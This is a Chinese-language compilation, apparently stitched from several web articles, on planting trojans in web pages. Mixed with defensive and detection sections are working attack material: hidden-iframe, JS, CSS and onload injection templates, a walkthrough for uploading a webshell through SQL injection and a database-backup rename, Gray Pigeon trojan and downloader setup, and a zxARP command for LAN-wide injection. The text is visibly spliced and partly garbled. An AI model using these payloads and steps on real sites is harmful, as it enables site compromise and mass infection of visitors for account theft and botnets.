网页挂马详细步骤教程

挂马与检测技术报告什么是挂马？所谓的挂马，就是黑客通过各种手段，包括SQL注入，敏感文件扫描，服务器漏洞，程序0day, 等各种方法获得管理员账号，然后登陆后台，通过数据库备份/恢复或者上传漏洞获得一个webshell。

利用获得的webshell修改页面的容，向页面中加入恶意转向代码。

也可以直接通过弱口令获得服务器或者FTP，然后直接对页面直接进行修改。

当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。

挂马的危害危害和应用的普及程度有关，上网人人都会，也就是说，人人都可能中毒。

据金山毒霸安全实验室统计，每天有数百万次浏览与挂马网页有关，中毒概率在20%-50%之间。

很多游戏被挂马，黑客目的就是盗取浏览该玩家的游戏账号，而那些大型被挂马，则是为了搜集大量的肉鸡。

被挂马不仅会让自己的失去信誉，丢失大量客户，也会让我们这些普通用户陷入黑客设下的陷阱，沦为黑客的肉鸡。

如果不小心进入了已被挂马的，则会感染木马病毒，以致丢失大量的宝贵文件资料和账号密码，其危害极大。

挂马泛滥的原因利。

病毒木马黑色产业链有丰厚的利润，去年警方抓获的大小姐系列木马案，犯罪集团3个月获得非常收益3000万。

网络应用越普及，黑色产业链的从业者收益也就越高。

挂马围哪些容易被挂马呢？越是流量高的对黑客越有吸引力，黑客攻破一个管理上有漏洞并且流量很高的，一天就可以感染数百万人。

那些与公共事业密切相关的，比如政府机关的，，视频，聊天交友，提供盗版软件破解工具的最容易被入侵，几乎每周出现的热点网络事件都被攻击者利用，网民一不小心就会受热门事件吸引中招。

挂马的常见方式1.框架挂马<iframe src=地址 width=0 height=0></iframe>其中“地址”处可以输入恶意等。

属性为0意味着该框架是不可见的，受害者若不查看源代码很难发现网页木马。

这个方法也是挂马最常用的一段代码，但是随着管理员和广大网民安全意识的提高，只要在源代码中搜索iframe这个关键字，就很容易找到网页木马的源头。

挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码（通常是通过IFrame、Script引用来实现），当用户访问该网页时，嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件（如Flash、PDF插件等）漏洞，在用户不知情的情况下下载并执行恶意木马。

挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL，比如下面的挂马代码：<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0，使得嵌入的网马URL在网页上不可见。

<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。

通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。

除了这两种常见的挂马方式外，还有如下几种：1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。

2、利用网页跳转、弹出新窗口等方式进行挂马。

3、利用Flash等媒体封装的方式进行挂马。

4、在CSS（层叠样式表）里可以执行JavaScript的浏览器中进行挂马。

挂马常见类型常见的几种类型如下：1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中，如果网站页面使用到这些字段的值，并且没做适当的过滤，就有可能导致用户访问该网站的页面时执行攻击者注入的代码。

2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。

3、ARP挂马在与目标站点同一局域网的情况下，攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗，并将挂马代码注入到用户请求的响应页面上，从而达到隐蔽的挂马目的。

网页挂马之实战详解不论是那一种帮凶，黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下，顺利将木马保存到被黑电脑中然后运行，经过多年的演变与发展，目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页)，当被黑者浏览这个网页，就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该漏洞，此方法当然就无效)。

一般而言黑客想要利用漏洞来进行黑客任务，几乎都必须自己写工具程序才行，不过在黑客的世界中永远有奉献出自己心力的慈善家，因此网络上就有一些针对某些漏洞而设计的木马生成器，让许多黑客 (特别是初学者黑客) 可以不必学习高深的编程就能轻易的利用这类工具来进行黑客任务，在本问题中我们就是要详细讨论黑客如何利用这类工具来进行工作。

由于这类工具是帮助真正的木马植入被黑电脑中与运行，因此应该称为木马帮凶，而不是真正的木马，因此严格来说它应该是木马帮凶生成器，而不是木马生成器，像 Sub7 editserver.exe 或 Optix PRO Builder.exe 才算是名符其实的木马生成器。

◎木马帮凶生成器的问题与盲区可能有读者会认为：既然有现成的工具，那要设计一个木马网页就不是难事! 在网络随便查找就有一大堆，的确没错，虽然在搜索网站输入网马生成器、木马生成器就可找到很多 (大多是在我国内地)，但是有经验黑客并不会因此而高兴，因为这些木马帮凶生成器的问题很多，并非找到后下载就能顺利使用，主要有下列问题：．虽然在查找网站中有找到，但单击后该网页已经不见了，当然也就不可能下载木马帮凶生成器，这种情况很常见，只好再试下一个查找到的项目。

．有些木马生成器是利用一年前或是更久之前的漏洞 (Windows 系统或 IE 的漏洞) 设计的，就算下载后可以正常使用，但对于已修补该漏洞的电脑当然就无效，也就是说年代愈久，木马生成器愈没有利用的价值 (对许多电脑可能都无效)，因此这类木马查找到一大堆也几乎是废物。

---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一，在 2008 年到2010 年间，网页挂马攻击更是成为了黑客最主要的攻击手段。

根据瑞星云安全系统监测， 2008 年到 2010 年间，客户端受到恶意网马的年攻击次数达到千万级别。

虽然近两年来，网络钓鱼攻击已经在数量上超越了网页挂马攻击，但是网页挂马攻击所带来的危害依然巨大，不仅对网站的安全运行造成威胁，对客户端用户来说，网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。

常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后，在网站的页面中插入一些代码，当浏览者访问到这些包含有恶意代码的网页时，就会在不知不觉中执行相应的漏洞利用程序。

这些程序可以在浏览者的电脑上下载并执行木马程序，导致浏览者的电脑成为黑客的肉鸡。

挂马操作可以有多种方式实现，以下是比较常见的几种挂马攻击手段。

1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架，在访问网页时，从网页表面是无法通过肉眼看到这个框架的，只能通过网页源码分析或抓包的方式查看到相应的数据信息。

1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中，同时恶意篡改网站文件中的 JS 文件代。

一般来讲，那些被全站引用的 JS 代码最容易被黑客挂马。

3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理，黑客通过加密代码的方式隐藏了该信息。

4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的，当用户访问挂有以上代码的网页时，页面就会自动跳转去执行黑客指定的恶意页面，从而导致挂在恶意页面的木马在本地被执行。

网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件，如果网站存在SQL注入漏洞，则比较容易取得一定的权限。

如果在服务器上对网站目录等做了较严格的权限限制，也是比较容易取得Webshell权限，具有Webshell权限可以对网页文件进行修改，而挂马就是在网页中加入一些代码。

这些代码往往是利用浏览器或者应用程序的漏洞，浏览者在访问这些网页时，往往会在不知不觉中去下载一些木马程序来执行。

网站挂马的原理就是设置框架网页的宽度和高度为0，将一些恶意网页隐藏起来，用户访问网站时不容易觉察。

目前在网络上有很多网页木马生成器，简称“网马生成器”，本案例以“Ms-0733网马生成器”为例，来讲解如何进行网站挂马攻击。

步骤一配置网页木马。

在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端，然后直接运行“Ms-0933网马生成器”在网马地址中输入“/test.exe”，如图1所示，然后单击“生成木马”即可生成一网页文件HACKLL.HTM。

配置Ms-0733网马生成器步骤二修改网站网页文件。

在网站首页文件index.asp中加入已经配置好的网页木马htm文件，一般通过在页面中加入“”来实现，如图2所示。

加入木马代码到正常网页网页木马利用的是IE浏览器存在的漏洞，其网页木马最本质的东西有两个一个是脚本，另外一个是真正的木马服务端，利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。

其网页木马文件中多是一些JavaScript代码，如图3所示。

网页木马源代码测试网页木马是否能够正常执行。

在未安装微软的MS0933补丁程序的虚拟机中打开浏览器，并在其中输入网页木马的地址，一会儿后，在控制端就看见肉鸡上线了。

大量传播网页木马。

网页木马测试成功以后，就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上，只要访问者的系统未安装其网页木马利用的漏洞，如果系统未安装任何对网页木马进行防御的软件，则计算机感染网页木马的几率非常大。

网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上，“网页挂马”是一个出现频率很高的词汇。

关于某些网站被挂马导致大量浏览用户受到攻击，甚至造成财产损失的新闻屡见不鲜。

而这些挂马事件总能和一些软件漏洞联系起来。

那么，什么是网页挂马？网页挂马和软件漏洞有什么联系？它的危害在什么地方，又该如何防御呢？本文结合攻防研究中的经验体会，将就这些问题进行探讨。

网页挂马简介什么是网页挂马要解释什么是网页挂马，要先从木马说起。

大家知道，木马是一类恶意程序，和其它的正常文件一样存在于计算机系统中。

这些恶意程序一旦运行，会连接到远处的控制端，使其享有恶意程序所在系统的大部分操作权限，例如给计算机增删密码，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等各种有害操作，而这些操作往往不被使用者察觉。

将木马与网页结合起来成为网页木马，表面看似正常的网页，当浏览者浏览该网页的同时也运行了木马程序。

网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞，自动下载已经放置在远端的恶意程序。

由于下载过程利用了软件上的漏洞，是非正常途径，不会被计算机系统或浏览器本身所察觉。

网页挂马指的是攻击者篡改了正常的网页，向网页中插入一段代码，当用户浏览网页的同时执行这段代码，将引导用户去浏览放置好的网页木马。

使用一些特别的技术可以使得这段代码的执行对用户来说不可见。

网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞，只要这些漏洞能够被利用并执行任意代码，那么存在漏洞的系统就有可能受到网页木马攻击。

网页挂马的技术门槛并不高，互联网上可以得到很多现成的攻击工具。

同时网页木马隐蔽性高，挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行，用户都无法察觉。

网页挂马的传播范围同被挂马网页的数量和浏览量成正比。

各种类型的网站都可以成为网页挂马的对象。

上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。

一:框架挂马[iframe src=地址width=0 height=0][/iframe]二:js文件挂马首先将以下代码document.write("[iframe width='0' height='0' src='地址'][/iframe]");保存为xxx.js，则JS挂马代码为[script language=javascript src=xxx.js][/script]三:js变形加密[SCRIPT language="JScript.Encode"src=/muma.txt][/script]muma.txt可改成任意后缀四:body挂马[body onload="window.location='地址';"][/body]五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML+ '\r\n[iframe src="/muma.htm/"][/iframe]';六:css中挂马body { background-image: url('javascript:document.write("[scriptsrc=/muma.js][/script]")')}七:JAJA挂马[SCRIPT language=javascript] window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1"); [/script]八:图片伪装[html] [iframe src="网马地址" height=0 width=0][/iframe][img src="图片地址"][/center][/html]九:伪装调用：[frameset rows="444,0" cols="*"][frame src="打开网页" framborder="no" scrolling="auto" noresizemarginwidth="0"margingheight="0"][frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"][frameset]十:高级欺骗[a href="(迷惑连接地址，显示这个地址指向木马地址)"onMouseOver="www_163_com(); return true;"] 页面要显示的内容[/a][SCRIPT Language="JavaScript"]function www_163_com (){ var url="网马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");} [/SCRIPT]以上[]得用尖括号代替原文出自【比特网】，转载请保留原文链接：/64/11369064.shtml。

如果你访问××网站（国内某门户网站），你就会中灰鸽子木马。

这是我一黑客朋友给我说的一句说。

打开该网站的首页，经检查，我确实中了灰鸽子。

怎么实现的呢？他说，他侵入了该网站的服务器并在网站主页上挂了网页木马；一些安全专家常说，不要打开陌生人发来的网址，为什么？因为该网址很有可能就是一些不怀好意者精心制作的网页木马。

以上只是网页木马的两种形式，实际上网页木马还可以挂在多媒体文件（RM、RMVB、WMV、WMA、Flash）、电子邮件、论坛等多种文件和场合上。

很可怕吧，那么用户如何防范网页木马呢？下面我们就先从网页木马的攻击原理说起。

一、网页木马的攻击原理首先明确，网页木马实际上是一个HTML网页，与其它网页不同的是该网页是黑客精心制作的，用户一旦访问了该网页就会中木马。

为什么说是黑客精心制作的呢？因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞，让IE在后台自动下载黑客放置在网络上的木马并运行（安装）这个木马，也就是说，这个网页能下载木马到本地并运行（安装）下载到本地电脑上的木马，整个过程都在后台运行，用户一旦打开这个网页，下载过程和运行（安装）过程就自动开始。

有朋友会说，打开一个网页，IE浏览器真的能自动下载程序和运行程序吗？如果IE真的能肆无忌惮地任意下载和运行程序，那天下还不大乱。

实际上，为了安全，IE浏览器是禁止自动下载程序特别是运行程序的，但是，IE浏览器存在着一些已知和未知的漏洞，网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。

下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。

⒈自动下载程序<SCRIPT LANGUAGE="icyfoxlovelace"src="/1.exe"></SCRIPT>小提示：代码说明a. 代码中“src”的属性为程序的网络地址，本例中“/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序，这段代码能让网页下载该程序到浏览它的电脑上。

挂马常用方式1. 什么是挂马？挂马是指黑客利用各种手段将恶意软件或恶意代码植入到合法网站或应用程序中，使用户在访问这些网站或使用这些应用程序时，受到恶意软件的攻击。

挂马的目的通常是窃取用户的个人信息、登录凭证、银行卡信息等敏感数据，或者利用受感染的机器进行网络攻击、传播病毒等。

2. 挂马常用方式2.1 SQL注入SQL注入是指黑客通过在应用程序的输入框中插入恶意的SQL代码，从而获取数据库中的数据或者执行非法操作。

黑客可以通过注入恶意代码，将恶意软件植入到网站的数据库中，使得用户在访问网站时被感染。

2.2 文件上传漏洞文件上传漏洞是指应用程序在处理用户上传的文件时，没有对文件进行充分的验证和过滤，导致黑客可以上传包含恶意代码的文件，并将其保存在服务器上。

当其他用户访问包含恶意文件的页面时，恶意代码会被执行，从而实现挂马的目的。

2.3 XSS攻击XSS（Cross-Site Scripting）攻击是指黑客通过在网页中插入恶意的脚本代码，使得用户在浏览网页时受到攻击。

黑客可以利用XSS漏洞，将恶意代码植入到合法网站中，当其他用户访问被植入恶意代码的网页时，恶意代码会被执行，从而实现挂马的目的。

2.4 漏洞利用黑客经常会利用已知的软件漏洞来进行挂马攻击。

他们会寻找应用程序或操作系统中的安全漏洞，并利用这些漏洞来植入恶意代码。

因此，及时更新软件和操作系统，修补已知的漏洞是防止挂马攻击的重要措施之一。

2.5 木马程序木马程序是一种隐藏在合法程序中的恶意代码，它可以在用户不知情的情况下运行，并与黑客的控制服务器进行通信。

黑客可以通过木马程序远程控制受感染的计算机，并进行各种恶意操作，包括挂马攻击。

3. 防御挂马攻击的措施3.1 安全编码开发人员应该遵循安全编码的最佳实践，包括输入验证、输出过滤、参数化查询等，以减少挂马攻击的可能性。

应用程序应该对用户输入进行充分的验证和过滤，确保只接受符合规范的数据，并对输出进行适当的过滤，防止恶意代码的注入。

网站挂马1，扫描准备入侵的网站·寻找注射点·使用的工具NBSI3.02，进入后台后，找一个可以上传文件的地方·比如说添加新闻·任何动态网站都会有添加新闻的功能的·3，上传小马abc.asp 一般的网站都会不允许直接上传.asp格式的文件，但允许上传.gif等图片的格式，因此先将abc.asp改为abc.gif,, 上传··然后检测一下是否上传成功4．这里表示小马已经上传成功了··然后我们通过修改备份数据库··来将Abc.gif改为.asp后缀格式的注意当前数据库路径前面两个点不能掉～！『确定』5．数据库备份成功～！然后通过浏览器访问如下URL/admin/Databackup/fuck.aspfuck.asp 是自己开始定义的名字·我们打开如下小马界面：6．接下来我们上传大马：上传成功后，在浏览器中访问大马7．这样我们就得到了WEBSHELL 了～～！接下来我们可以通过功能8FSO文件浏览操作器到主页上写入一句话木马，，给自己留个后门，或者直接在网页上写入一个网页跳转·<iframe src=/wm.exe width=0 height=0></iframe>这句话的意思就是，当有人访问我们准备入侵的网站的网页时（如：），它会自动打开一个我自己另外一个网站,上面的我绑定了木马的网页：wm.exe在这里我们可以通过MS06014这个IE漏洞利用程序讲我们的木马和网页绑定这里的muma.exe可以是直接绑定的木马也可以绑定的‘下载者’程序，他们之间的区别就在于，如果是直接绑定的木马，当用于访问被挂马的网站时，同时打开我的网页，由于我设置的高和宽都为0 ，所以我们肉眼看不见而已，开车我们网页后他就直接下载我们的木马··如果木马体积比较大的话，很容易造成浏览器假死的现象，因此这里可以将‘下载者’这个程序和我的网页绑定，这样，当用户访问被入侵的网站时，它会自动将体积很小的下载者下下来·然后自动运行··然后下载者的功能就是去下载我们真正的木马～！这样，不但不会造成浏览器的假死··还可以穿透防火墙，8．这里的木马我们可以配置一个鸽子，加免杀配置鸽子：1．首先架设一个FTP服务器和WEB服务器，或者你可以用公网的申请一个免费的空间这里表示我已经架设好了WEB和FTP服务器了··我的WEB，FTP服务器地址为192.168.200.3网站为我挂马的WEB服务器地址为192.168.200.2网站为2配置鸽子的自动上线··如下下面IP文件内容的地址我写错了··应该就是运行我鸽子主程序的地址192.168.200.1 这是我本机（真实机）2．接下来配置服务程序这里的通知地址我写的我的网站域名，因为真实的环境IP是变动的，但域名不会变，因此我们可以搞一个花生壳动态域名绑定·这样我们就不用再担心IP变动的这个情况了～！一般在公网上挂马也就是写的自己的空间域名地址～！9．这样我们的鸽子的服务端就已经生成了···然后再按文章开头前面的方法··将鸽子挂到网上去～～！整个的一个思路是，访问被挂马的网站自动从我的空间上下载用户――――――――下载者――――――――――木马（鸽子）实验成功了，，如下。

专家教你如何进行网站挂马检测与清除不完全统计，90%的网站都被挂过马，挂马是指在获取网站或者网站服务器的部分或者全部权限后，在网页文件中插入一段恶意代码，这些恶意代码主要是一些包括IE等漏洞利用代码，用户访问被挂马的页面时，如果系统没有更新恶意代码中利用的漏洞补丁，则会执行恶意代码程序，进行盗号等危险超过。

目前挂马主要是为了商业利益，有的挂马是为了赚取流量，有的是为了盗取游戏等账号，也有的是为了好玩，不管是处于那种目的，对于访问被挂马的网站来说都是一种潜在的威胁，影响运营网站公司形象。

当一个网站运营很长时间后，网站文件会非常多，手工查看网页文件代码非常困难，杀毒软件仅仅对恶意代码进行查杀，对网页木马以及挂马程序不一定全部查杀，本文就如何利用一些安全检测工具软件来检测和清除网站木马方面进行探讨，使用本文提及的工具可以很轻松的检测网站是否被挂马。

(一)检测挂马页面1.安装urlsnooper软件Urlsnooper是一款URL嗅探工具，其官方主页地址为：，目前已经不提供免费下载了，可以到-11525.html下载该软件。

安装非常简单，按照提示进行安装即可。

第一次使用时需要程序会自动检查网卡，查看能否正常连接网络，设置正确无误后，应该出现如图1所示的画面。

图1安装正确后的界面2.对网站进行侦测在Urlsnooper中的“ProtocolFilter”中选择“ShowAll”，然后单击“SniffNetwor k”按钮开始监听网络。

接着使用IE浏览器打开需要进行检测木马的网站，Urlsnooper会自动抓取网站中的所有连接，在Index中按照五位数字序号进行排列，如图2所示。

图2监听结果说明：在侦测结果中可能包含的连接地址非常多，这个时候就需要进行排查，可以选中每一个记录，Urlsnooper会在下方中显示详细的监听结果，如图2所示，就发现存在一段挂马代码：在百度搜索中对其进行搜索，如图3所示，有30多项搜索结果，从查询结果可以辅佐证明该段代码为挂马代码。

黑客攻防：网页挂马攻防全接触网页挂马是攻击者惯用的入侵手段，其影响极其恶劣。

不仅让站点管理者蒙羞，而且殃及池鱼使站点的浏览者遭殃。

不管是站点维护者还是个人用户，掌握、了解一定的网页挂马及其防御技术是非常必要的。

1、关于网页挂马网页挂马就是攻击者通过在正常的页面中（通常是网站的主页）插入一段代码。

浏览者在打开该页面的时候，这段代码被执行，然后下载并运行某木马的服务器端程序，进而控制浏览者的主机。

2、获取Webshell攻击者要进行网页挂马，必须要获取对站点文件的修改权限，而获取该站点Webshell是最普遍的做法。

其实可供攻击者实施的攻击手段比较多，比如注入漏洞、跨站漏洞、旁注漏洞、上传漏洞、暴库漏洞和程序漏洞都可被利用。

下面就列举一个当前比较流行的eWEBEditor在线HTML编辑器上传漏洞做个演示和分析。

1）.网站入侵分析eWEBEditor是一个在线的HTML编辑器，很多网站都集成这个编辑器，以方便发布信息。

低版本的eWEBEditor在线HTML编辑器，存在者上传漏洞，黑客利用这点得到WEBSHELL（网页管理权限）后，修改了网站，进行了挂马操作。

其原理是：eWEBEditor的默认管理员页面没有更改，而且默认的用户名和密码都没有更改。

攻击者登陆eWEBEditor后，添加一种新的样式类型，然后设置上传文件的类型，加入asp文件类型，就可以上传一个网页木马了。

（图1）2）.判断分析网页漏洞（1）.攻击者判断网站是否采用了eWEBEditor的方法一般都是通过浏览网站查看相关的页面或者通过搜索引擎搜索类似"ewebeditor.asp？id="语句，只要类似的语句存在，就能判断网站确实使用了WEB编辑器。

（2）.eWEBEditor编辑器可能被黑客利用的安全漏洞：a.管理员未对数据库的路径和名称进行修改，导致黑客可以利用编辑器默认路径直接对网站数据库进行下载。

b.管理员未对编辑器的后台管理路径进行修改导致黑客可以通过数据库获得的用户名和密码进行登陆。

zxARPs局域网ARP欺骗挂马方式详细讲解（图文）一种新的挂马方式开始流行——局域网ARP欺骗挂马，只要局域网内一台机子中招了，它就可以在内网传播含有木马的网页，捕获的肉鸡就会成几何增长。

局域网ARP欺骗挂马的好处如下：无需入侵网站，只要你的主机处于局域网中即可，这是它最大的优点;收获的肉鸡多多，短时间内可以收获数十台甚至上百台肉鸡，类似网吧这样由上百台电脑组成的局域网是最好的挂马场所;局域网内的用户访问任何网站都会中我们的木马。

看了上面的介绍，各位是不是已经蠢蠢欲动了第一步：配置木马服务端第七城市我们以“黑洞”木马为例。

运行“黑洞”木马的Client.e某e文件，进入Client.e某e的主界面后，点击“文件→创建DLL插入版本服务端程序”。

填写密码第七城市第二步：生成网页木马点击“生成网马”第三步：局域网挂马最后该请我们的主角出场了，就是上文中提到的小工具，这个工具叫z某ARP，是一个通过ARP欺骗实现局域网挂马的工具。

在使用z某ARP前我们要安装WinPcap，它是网络底层驱动包，没有它z某ARP就运行不了。

第七城市安装好后将z某ARP放到任意目录，然后运行“命令提示符”，进入z某ARP所在的目录，然后输入命令：z某ARP.e某e-id某0-ip192.168.0.1-192.168.0.255-port80-inert\rc=\从现在开始，局域网中的用户无论访问什么网站，都会运行我们的网页木马，因为z某ARP在用户打开网页的同时已经将挂马代码插入到正常网页中了。

ARP挂马防范技巧从上文可见z某ARP的功能真的十分强大，但它毕竟是基于ARP欺骗原理的，只要局域网内的主机能够抵御ARP欺骗攻击，就可以完全无视z 某ARP的挂马方法。

护我们免受ARP欺骗的攻击了(图4)。

这时如果有人对你的主机进行ARP欺骗攻击，我们在可以点击“记录”按钮，查看攻击者的IP地址。

Web安全目录一、什么是Web安全二、Web安全威胁日趋严重的原因三、常见的WEB安全攻击种类四、WEB应用防火墙五、梭子鱼WEB应用防火墙技术一览一、什么是Web安全二、Web安全威胁日趋严重的原因三、常见的WEB安全攻击种类展开一、什么是Web安全随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生，基于Web环境的互联网应用越来越广泛，企业信息化的过程中各种应用都架设在Web平台上，Web业务的迅速发展也引起黑客们的强烈关注，接踵而至的就是Web安全威胁的凸显，黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限，轻则篡改网页内容，重则窃取重要内部数据，更为严重的则是在网页中植入恶意代码，使得网站访问者受到侵害。

这也使得越来越多的用户关注应用层的安全问题，对Web应用安全的关注度也逐渐升温。

二、Web安全威胁日趋严重的原因目前很多业务都依赖于互联网，例如说网上银行、网络购物、网游等，很多恶意攻击者出于不良的目的对Web 服务器进行攻击，想方设法通过各种手段获取他人的个人账户信息谋取利益。

正是因为这样，Web业务平台最容易遭受攻击。

同时，对Web服务器的攻击也可以说是形形色色、种类繁多，常见的有挂马、SQL注入、缓冲区溢出、嗅探、利用IIS等针对Webserver 漏洞进行攻击。

一方面，由于TCP/IP的设计是没有考虑安全问题的，这使得在网络上传输的数据是没有任何安全防护的。

攻击者可以利用系统漏洞造成系统进程缓冲区溢出，攻击者可能获得或者提升自己在有漏洞的系统上的用户权限来运行任意程序，甚至安装和运行恶意代码，窃取机密数据。

而应用层面的软件在开发过程中也没有过多考虑到安全的问题，这使得程序本身存在很多漏洞，诸如缓冲区溢出、SQL注入等等流行的应用层攻击，这些均属于在软件研发过程中疏忽了对安全的考虑所致。

另一方面，用户对某些隐秘的东西带有强烈的好奇心，一些利用木马或病毒程序进行攻击的攻击者，往往就利用了用户的这种好奇心理，将木马或病毒程序捆绑在一些艳丽的图片、音视频及免费软件等文件中，然后把这些文件置于某些网站当中，再引诱用户去单击或下载运行。